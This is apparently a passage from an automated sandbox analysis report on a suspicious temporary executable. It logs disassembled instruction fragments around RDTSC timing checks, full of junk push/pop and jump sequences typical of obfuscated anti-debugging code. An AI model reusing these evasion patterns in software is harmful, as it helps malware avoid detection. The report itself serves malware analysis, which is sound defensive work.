Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100235 second address: 510023B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 510023B second address: 510024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD5Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 510024A second address: 5100265 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9F53C6A7Eh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100265 second address: 5100269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100269 second address: 510026F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 510026F second address: 5100374 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC9F53DFD5Ch 0x00000012 xor cx, 3868h 0x00000017 jmp 00007FC9F53DFD5Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FC9F53DFD68h 0x00000023 add al, FFFFFFC8h 0x00000026 jmp 00007FC9F53DFD5Bh 0x0000002b popfd 0x0000002c popad 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FC9F53DFD66h 0x00000034 and cx, 8D28h 0x00000039 jmp 00007FC9F53DFD5Bh 0x0000003e popfd 0x0000003f pushfd 0x00000040 jmp 00007FC9F53DFD68h 0x00000045 sbb esi, 3787BF88h 0x0000004b jmp 00007FC9F53DFD5Bh 0x00000050 popfd 0x00000051 popad 0x00000052 popad 0x00000053 test esi, esi 0x00000055 jmp 00007FC9F53DFD66h 0x0000005a je 00007FCA671FE032h 0x00000060 pushad 0x00000061 call 00007FC9F53DFD5Eh 0x00000066 movzx esi, di 0x00000069 pop edx 0x0000006a jmp 00007FC9F53DFD5Ch 0x0000006f popad 0x00000070 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FC9F53DFD5Ah 0x00000080 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100374 second address: 5100378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100378 second address: 510037E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 510037E second address: 5100452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FCA671E4D11h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC9F53C6A7Eh 0x00000016 adc cx, D9D8h 0x0000001b jmp 00007FC9F53C6A7Bh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FC9F53C6A88h 0x00000027 jmp 00007FC9F53C6A85h 0x0000002c popfd 0x0000002d popad 0x0000002e mov edx, dword ptr [esi+44h] 0x00000031 jmp 00007FC9F53C6A7Eh 0x00000036 or edx, dword ptr [ebp+0Ch] 0x00000039 jmp 00007FC9F53C6A80h 0x0000003e test edx, 61000000h 0x00000044 pushad 0x00000045 pushad 0x00000046 mov ecx, 5FB00FE3h 0x0000004b call 00007FC9F53C6A88h 0x00000050 pop esi 0x00000051 popad 0x00000052 movsx edi, cx 0x00000055 popad 0x00000056 jne 00007FCA671E4CC8h 0x0000005c jmp 00007FC9F53C6A7Ah 0x00000061 test byte ptr [esi+48h], 00000001h 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 mov cx, 400Fh 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F07FF second address: 50F08D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 mov ah, 56h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF8h 0x0000000d pushad 0x0000000e mov bh, 47h 0x00000010 push esi 0x00000011 call 00007FC9F53DFD61h 0x00000016 pop esi 0x00000017 pop edi 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a jmp 00007FC9F53DFD5Ch 0x0000001f push eax 0x00000020 pushad 0x00000021 mov edx, esi 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC9F53DFD64h 0x0000002c or si, AFE8h 0x00000031 jmp 00007FC9F53DFD5Bh 0x00000036 popfd 0x00000037 jmp 00007FC9F53DFD68h 0x0000003c popad 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f call 00007FC9F53DFD5Eh 0x00000044 pushfd 0x00000045 jmp 00007FC9F53DFD62h 0x0000004a and eax, 35C284A8h 0x00000050 jmp 00007FC9F53DFD5Bh 0x00000055 popfd 0x00000056 pop ecx 0x00000057 mov edi, 5A3FA8ECh 0x0000005c popad 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 movsx edx, cx 0x00000064 call 00007FC9F53DFD68h 0x00000069 pop esi 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F09F0 second address: 50F0A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test byte ptr [76FA6968h], 00000002h 0x00000011 jmp 00007FC9F53C6A80h 0x00000016 jne 00007FCA671EC40Eh 0x0000001c jmp 00007FC9F53C6A80h 0x00000021 mov edx, dword ptr [ebp+0Ch] 0x00000024 jmp 00007FC9F53C6A80h 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov edx, 464E9EE0h 0x00000032 pushfd 0x00000033 jmp 00007FC9F53C6A89h 0x00000038 sub ecx, 2253DFE6h 0x0000003e jmp 00007FC9F53C6A81h 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0A83 second address: 50F0AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC9F53DFD5Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0AA7 second address: 50F0AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FC9F53C6A86h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC9F53C6A87h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0AE7 second address: 50F0AED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0AED second address: 50F0B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov si, bx 0x00000010 mov si, di 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC9F53C6A88h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B22 second address: 50F0B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B28 second address: 50F0B44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+14h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B44 second address: 50F0B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B48 second address: 50F0B4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B4E second address: 50F0B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD61h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B63 second address: 50F0B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0B67 second address: 50F0BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC9F53DFD66h 0x00000014 sub esi, 6AA77CF8h 0x0000001a jmp 00007FC9F53DFD5Bh 0x0000001f popfd 0x00000020 push eax 0x00000021 pop ebx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 50F0BA1 second address: 50F0BB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A80h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100CFC second address: 5100D19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100D19 second address: 5100D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100D1F second address: 5100D5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, 79312966h 0x00000014 call 00007FC9F53DFD67h 0x00000019 pop ecx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100A52 second address: 5100A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100A56 second address: 5100A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100A70 second address: 5100ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, bx 0x00000010 pushfd 0x00000011 jmp 00007FC9F53C6A87h 0x00000016 add ecx, 6274CE7Eh 0x0000001c jmp 00007FC9F53C6A89h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5100ABF second address: 5100AE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9F53DFD5Dh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5180616 second address: 518061A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 518061A second address: 5180620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5180620 second address: 518064B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC9F53C6A85h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 518064B second address: 5180668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5180668 second address: 518066C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 518066C second address: 518067F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170AA9 second address: 5170AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170AC5 second address: 5170AD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5110008 second address: 51100B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edx, ax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC9F53C6A88h 0x00000013 xor esi, 2A4D7248h 0x00000019 jmp 00007FC9F53C6A7Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FC9F53C6A88h 0x00000025 sub ax, B4A8h 0x0000002a jmp 00007FC9F53C6A7Bh 0x0000002f popfd 0x00000030 popad 0x00000031 pushfd 0x00000032 jmp 00007FC9F53C6A88h 0x00000037 or eax, 3762A708h 0x0000003d jmp 00007FC9F53C6A7Bh 0x00000042 popfd 0x00000043 popad 0x00000044 push eax 0x00000045 jmp 00007FC9F53C6A89h 0x0000004a xchg eax, ebp 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51100B8 second address: 51100BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51100BE second address: 51100D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, 9BC8h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51100D0 second address: 51100E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51100E8 second address: 51100EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170D06 second address: 5170D1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170D1B second address: 5170DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9F53C6A87h 0x00000009 sbb ax, 9CCEh 0x0000000e jmp 00007FC9F53C6A89h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push esi 0x00000018 jmp 00007FC9F53C6A7Ah 0x0000001d mov dword ptr [esp], ebp 0x00000020 pushad 0x00000021 mov edi, eax 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007FC9F53C6A7Fh 0x0000002b push dword ptr [ebp+0Ch] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FC9F53C6A84h 0x00000035 xor ecx, 06B11AD8h 0x0000003b jmp 00007FC9F53C6A7Bh 0x00000040 popfd 0x00000041 pushad 0x00000042 mov cx, 0C25h 0x00000046 mov ebx, eax 0x00000048 popad 0x00000049 popad 0x0000004a push dword ptr [ebp+08h] 0x0000004d pushad 0x0000004e mov ecx, 010907D9h 0x00000053 movzx eax, dx 0x00000056 popad 0x00000057 call 00007FC9F53C6A79h 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FC9F53C6A7Ch 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170DD3 second address: 5170E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, 19h 0x0000000d push esi 0x0000000e mov edi, 1E39BF62h 0x00000013 pop edx 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jmp 00007FC9F53DFD5Fh 0x0000001f movzx esi, di 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170E0E second address: 5170E14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5170E14 second address: 5170E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53DFD65h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120673 second address: 512068B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9F53C6A84h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 512068B second address: 51206A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC9F53DFD5Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51206A9 second address: 51206AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51206AD second address: 51206B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51206B3 second address: 51206D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 movzx eax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC9F53C6A84h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51206D6 second address: 5120709 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 51519FE4h 0x00000008 jmp 00007FC9F53DFD5Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push FFFFFFFEh 0x00000012 jmp 00007FC9F53DFD5Eh 0x00000017 push 70A2E463h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120709 second address: 5120723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53C6A86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120723 second address: 512075F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9F53DFD61h 0x00000009 add cx, CAE6h 0x0000000e jmp 00007FC9F53DFD61h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xor dword ptr [esp], 065A247Bh 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov di, ax 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 512075F second address: 51207A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC9F53C6A81h 0x0000000a sbb al, FFFFFFF6h 0x0000000d jmp 00007FC9F53C6A81h 0x00000012 popfd 0x00000013 popad 0x00000014 call 00007FC9F53C6A79h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC9F53C6A7Dh 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 51207A3 second address: 5120865 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9F53DFD61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC9F53DFD61h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 jmp 00007FC9F53DFD67h 0x00000019 pushfd 0x0000001a jmp 00007FC9F53DFD68h 0x0000001f jmp 00007FC9F53DFD65h 0x00000024 popfd 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 jmp 00007FC9F53DFD61h 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 call 00007FC9F53DFD5Ah 0x00000039 pop eax 0x0000003a pushfd 0x0000003b jmp 00007FC9F53DFD5Bh 0x00000040 adc ch, FFFFFFAEh 0x00000043 jmp 00007FC9F53DFD69h 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120865 second address: 512086B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 512086B second address: 5120917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a call 00007FC9F53DFD65h 0x0000000f mov edx, esi 0x00000011 pop esi 0x00000012 pushfd 0x00000013 jmp 00007FC9F53DFD5Dh 0x00000018 sub ch, 00000046h 0x0000001b jmp 00007FC9F53DFD61h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr fs:[00000000h] 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FC9F53DFD5Ch 0x0000002f sub si, 5BE8h 0x00000034 jmp 00007FC9F53DFD5Bh 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007FC9F53DFD68h 0x00000040 sub cx, EE48h 0x00000045 jmp 00007FC9F53DFD5Bh 0x0000004a popfd 0x0000004b popad 0x0000004c nop 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FC9F53DFD62h 0x00000055 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe RDTSC instruction interceptor: First address: 5120917 second address: 51209BC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC9F53C6A82h 0x00000008 or eax, 1F8513D8h 0x0000000e jmp 00007FC9F53C6A7Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ebx, esi 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC9F53C6A7Bh 0x00000021 or cx, 269Eh 0x00000026 jmp 00007FC9F53C6A89h 0x0000002b popfd 0x0000002c mov eax, 55D21A67h 0x00000031 popad 0x00000032 nop 0x00000033 jmp 00007FC9F53C6A7Ah 0x00000038 sub esp, 1Ch 0x0000003b pushad 0x0000003c mov edx, 792BA2B0h 0x00000041 popad 0x00000042 push esi 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FC9F53C6A82h 0x0000004a sub cl, 